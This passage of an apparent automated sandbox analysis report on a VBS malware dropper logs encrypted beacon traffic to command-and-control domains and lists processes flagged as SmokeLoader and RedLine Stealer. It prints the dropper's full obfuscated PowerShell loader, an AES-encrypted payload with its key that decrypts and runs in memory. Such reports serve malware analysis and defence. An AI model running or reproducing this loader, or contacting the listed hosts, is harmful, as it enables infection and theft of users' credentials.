                                                                                                                    Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                                    Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.84982594.156.177.51804084C:\Windows\explorer.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 19, 2024 07:54:21.611717939 CET284OUTPOST / HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://dgibnmnukcth.com/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Length: 305
                                                                                                                    Host: restructurisationservice.ru
                                                                                                                    Dec 19, 2024 07:54:21.611737013 CET305OUTData Raw: a1 5f 7d 55 8e 47 51 ca c1 4c ae bf fc b0 2a 4b 57 32 b0 59 61 c0 36 2b d9 52 b8 18 76 88 05 54 c8 54 ac fc 4d aa 73 42 2a bd cd 0d af 49 12 32 a2 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be a1 2f 54 b0
                                                                                                                    Data Ascii: _}UGQL*KW2Ya6+RvTTMsB*I2x]2m-^JrC)/TAEenlFdO1$'N5*ThD~VH<3QNR)?UHfM]&6`TW!B2?]KyVt.6YV>p=hMCKNq
                                                                                                                    Dec 19, 2024 07:54:22.981556892 CET597INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 19 Dec 2024 06:54:22 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                                    Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.849826109.70.26.37804084C:\Windows\explorer.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 19, 2024 07:54:23.305304050 CET279OUTPOST / HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://lygvohbryeni.com/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Length: 361
                                                                                                                    Host: connecticutproperty.ru
                                                                                                                    Dec 19, 2024 07:54:23.305330038 CET361OUTData Raw: a1 5f 7d 55 8e 47 51 ca c1 4c ae bf fc b0 2a 4b 57 32 b0 59 61 c0 36 2b d9 52 b8 18 76 88 05 54 c8 54 ac fc 4d aa 73 42 2a bd cd 0d af 49 12 32 a2 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be eb 31 21 8e
                                                                                                                    Data Ascii: _}UGQL*KW2Ya6+RvTTMsB*I2x]2m-^JrC)1! P@RSyQG5hELY3<L(,4pzPVk'w"{FNUJ;.m#d-vM~WKr?2|L.{\#.Hx'y3'^t%:R
                                                                                                                    Dec 19, 2024 07:54:24.645281076 CET300INHTTP/1.1 405 Not Allowed
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 19 Dec 2024 06:54:24 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 150
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.84983294.156.177.51804084C:\Windows\explorer.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 19, 2024 07:54:25.151771069 CET284OUTPOST / HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://hpkihdgfpdwnih.org/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Length: 309
                                                                                                                    Host: constractionscity1991.lat
                                                                                                                    Dec 19, 2024 07:54:25.151771069 CET309OUTData Raw: a1 5f 7d 55 8e 47 51 ca c1 4c ae bf fc b0 2a 4b 57 32 b0 59 61 c0 36 2b d9 52 b8 18 76 88 05 54 c8 54 ac fc 4d aa 73 42 2a bd cd 0d af 49 12 32 a2 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be b9 25 50 d1
                                                                                                                    Data Ascii: _}UGQL*KW2Ya6+RvTTMsB*I2x]2m-^JrC)%PGx]}SaI;WyH!ZPAKguHfZmzW^"ze<r#&P2 d mfGVZ!J!uICq;0-=O*_MH
                                                                                                                    Dec 19, 2024 07:54:26.507935047 CET595INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 19 Dec 2024 06:54:26 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                                    Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.84983894.156.177.51804084C:\Windows\explorer.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 19, 2024 07:54:26.635723114 CET287OUTPOST / HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://yitqmxmwjwycdun.org/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Length: 274
                                                                                                                    Host: restructurisationservice.ru
                                                                                                                    Dec 19, 2024 07:54:26.635741949 CET274OUTData Raw: a1 5f 7d 55 8e 47 51 ca c1 4c ae bf fc b0 2a 4b 57 32 b0 59 61 c0 36 2b d9 52 b8 18 76 88 05 54 c8 54 ac fc 4d aa 73 42 2a bd cd 0d af 49 12 32 a2 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be b9 45 38 bb
                                                                                                                    Data Ascii: _}UGQL*KW2Ya6+RvTTMsB*I2x]2m-^JrC)E8U6nyc[e#d 89<sLjR"NcU\sh@(ptjTdsd@m9N\v*tHk\u%[qI*F -&oo"T#t
                                                                                                                    Dec 19, 2024 07:54:27.998553991 CET597INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 19 Dec 2024 06:54:27 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                                    Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.849843109.70.26.37804084C:\Windows\explorer.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 19, 2024 07:54:28.122318029 CET280OUTPOST / HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://yfnvfnqkorbos.net/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Length: 167
                                                                                                                    Host: connecticutproperty.ru
                                                                                                                    Dec 19, 2024 07:54:28.122318029 CET167OUTData Raw: a1 5f 7d 55 8e 47 51 ca c1 4c ae bf fc b0 2a 4b 57 32 b0 59 61 c0 36 2b d9 52 b8 18 76 88 05 54 c8 54 ac fc 4d aa 73 42 2a bd cd 0d af 49 12 32 a2 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be f6 30 42 ad
                                                                                                                    Data Ascii: _}UGQL*KW2Ya6+RvTTMsB*I2x]2m-^JrC)0BHBWqoA%lE;8m*(.OEjBteLN/f>W
                                                                                                                    Dec 19, 2024 07:54:29.461914062 CET300INHTTP/1.1 405 Not Allowed
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 19 Dec 2024 06:54:29 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 150
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Click to jump to process

                                                                                                                    Click to jump to process

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Click to jump to process

                                                                                                                    Target ID:0
                                                                                                                    Start time:01:52:18
                                                                                                                    Start date:19/12/2024
                                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbs"
                                                                                                                    Imagebase:0x7ff7ff5c0000
                                                                                                                    File size:170'496 bytes
                                                                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:2
                                                                                                                    Start time:01:52:18
                                                                                                                    Start date:19/12/2024
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function kzVl($BRaA){return -split ($BRaA -replace '..', '0x$& ')};$Qiyjc = kzVl('583A9978E4D34538992E1A1351EF94C76F346575AEA09EB513401549161877EAF16C217FA53FAF8E9F5A6B6C98F436132CD64686F84B385701DF5CB57A496A57D083A739BD167A16F22386779010D0352280C205381DB165BF369C1DDC1AB0B20826DFB010CFDDCDFA3710E79E1F0DF5396A3CDCB1519A0E59214CB85DD8D5DB3598F5C3CC2D2307A104A5856E89829E0A80D0286C7C00A59C9857283FBDB29EB8E496DD4C09DA9F275960328E5AC89D55EBD3DCFED16A96B6882267D9DCBB1521E1A44EEC3CE3DA70C185B6D12547011407D8226CD2AE3CE2F55821F81B446119C95B163DB7DC61D936658509E877C1C06861FB6361BE198E404AE7F361887E373DC1A99E729EA6BCAD34C16C098676CBD7B34C34B4F6155017983594876DAC6BDB2C587F4A232BC97779B63E1A9088C50429F113E053CF31D6547C6D7F0ABE12F1F0B6A3F596803EBE69B5D5A6D1179C28BCAA989E167C59B3FF802844CBD654C0D6740476BF8F45699EB7ADB664C116B89504C4839F998A91C64E5E71E61B29061402831AAC2A34042CD38B595CF64B56303C0B9F31CEFD6C1F6AFD8BEDDEA69D470D2A173FC1496F22674C3559B74CED02F1DCEC4DABB38BA293DA8F762959B7DDA301EEA24D6B450354B04288F6385A2B2EDB10FA89F0D27FF2907D00A53F937FD89AB58F6811A166D5A633234208A16F44C7E1FDA1CA5781750D0FD0698B225A66882E2BC56217A52CCBF79E80ED2ABC2CDC8039511450AF5B112EADDA510CE1EED99D3EBFDAD959AB50B58880B9E56EC313C6B087C011B3DA810C2A5E3C6A90C69061B7B3ECED35C713C11874F6763FA79F0691D4FF8B99159BF1A716F811E9CBB8F818216B8AEF751BF044FBFE9DAA0CB892645C05F5D407EFED774BA5689A68FE5547020C0FE72F39D5ACA4');$mZBMz=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((kzVl('72786673574B4C516874716D49544E50')),[byte[]]::new(16)).TransformFinalBlock($Qiyjc,0,$Qiyjc.Length)); & $mZBMz.Substring(0,3) $mZBMz.Substring(3)
                                                                                                                    Imagebase:0x7ff6cb6b0000
                                                                                                                    File size:452'608 bytes
                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:3
                                                                                                                    Start time:01:52:18
                                                                                                                    Start date:19/12/2024
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:4
                                                                                                                    Start time:01:52:24
                                                                                                                    Start date:19/12/2024
                                                                                                                    Path:C:\Users\user\AppData\Roaming\putty.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\putty.exe"
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:295'424 bytes
                                                                                                                    MD5 hash:C02B57E6771A13513DC087F6B45ADAB0
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.1635941173.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1638027397.0000000000731000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1638027397.0000000000731000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1636745792.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1636745792.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000003.1568194811.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.1636678804.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 100%, Avira
                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:5
                                                                                                                    Start time:01:52:30
                                                                                                                    Start date:19/12/2024
                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                    Imagebase:0x7ff62d7d0000
                                                                                                                    File size:5'141'208 bytes
                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:7
                                                                                                                    Start time:01:52:48
                                                                                                                    Start date:19/12/2024
                                                                                                                    Path:C:\Users\user\AppData\Roaming\edrecib
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\edrecib
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:295'424 bytes
                                                                                                                    MD5 hash:C02B57E6771A13513DC087F6B45ADAB0
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.1858608967.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.1858830240.0000000000981000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.1858830240.0000000000981000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.1858660361.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000003.1807981755.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.1858680191.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.1858680191.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 100%, Avira
                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Reset < >
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1587538406.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_7ffb4adf0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d43cedfa6099f382eec4152db3db42b67335dd0c30a833d1da71487bd2f8f2fe
                                                                                                                      • Instruction ID: b1434294f16d88cd9374682b4769d2f5647097d33f0a09cf5017778c3f2c2a0e
                                                                                                                      • Opcode Fuzzy Hash: d43cedfa6099f382eec4152db3db42b67335dd0c30a833d1da71487bd2f8f2fe
                                                                                                                      • Instruction Fuzzy Hash: 76424AA2A0EBC54FE796AF3C88651B67FE4EF46210B1901FBE49DC71D3D9189C058392
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1587538406.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_7ffb4adf0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 02193ef045707fb830ed9fc8222d735912a0157379bedb9b9d04f1345cc271bf
                                                                                                                      • Instruction ID: f6edca7994906036d1309aff9c54007cafaca6236fbaef3ec754729b7f692f79
                                                                                                                      • Opcode Fuzzy Hash: 02193ef045707fb830ed9fc8222d735912a0157379bedb9b9d04f1345cc271bf
                                                                                                                      • Instruction Fuzzy Hash: 3341F4D3B0FE870BF3AABE3C89652F665C5DF84610B6901FDE46EC31D2DD0898414241
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1587538406.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_7ffb4adf0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
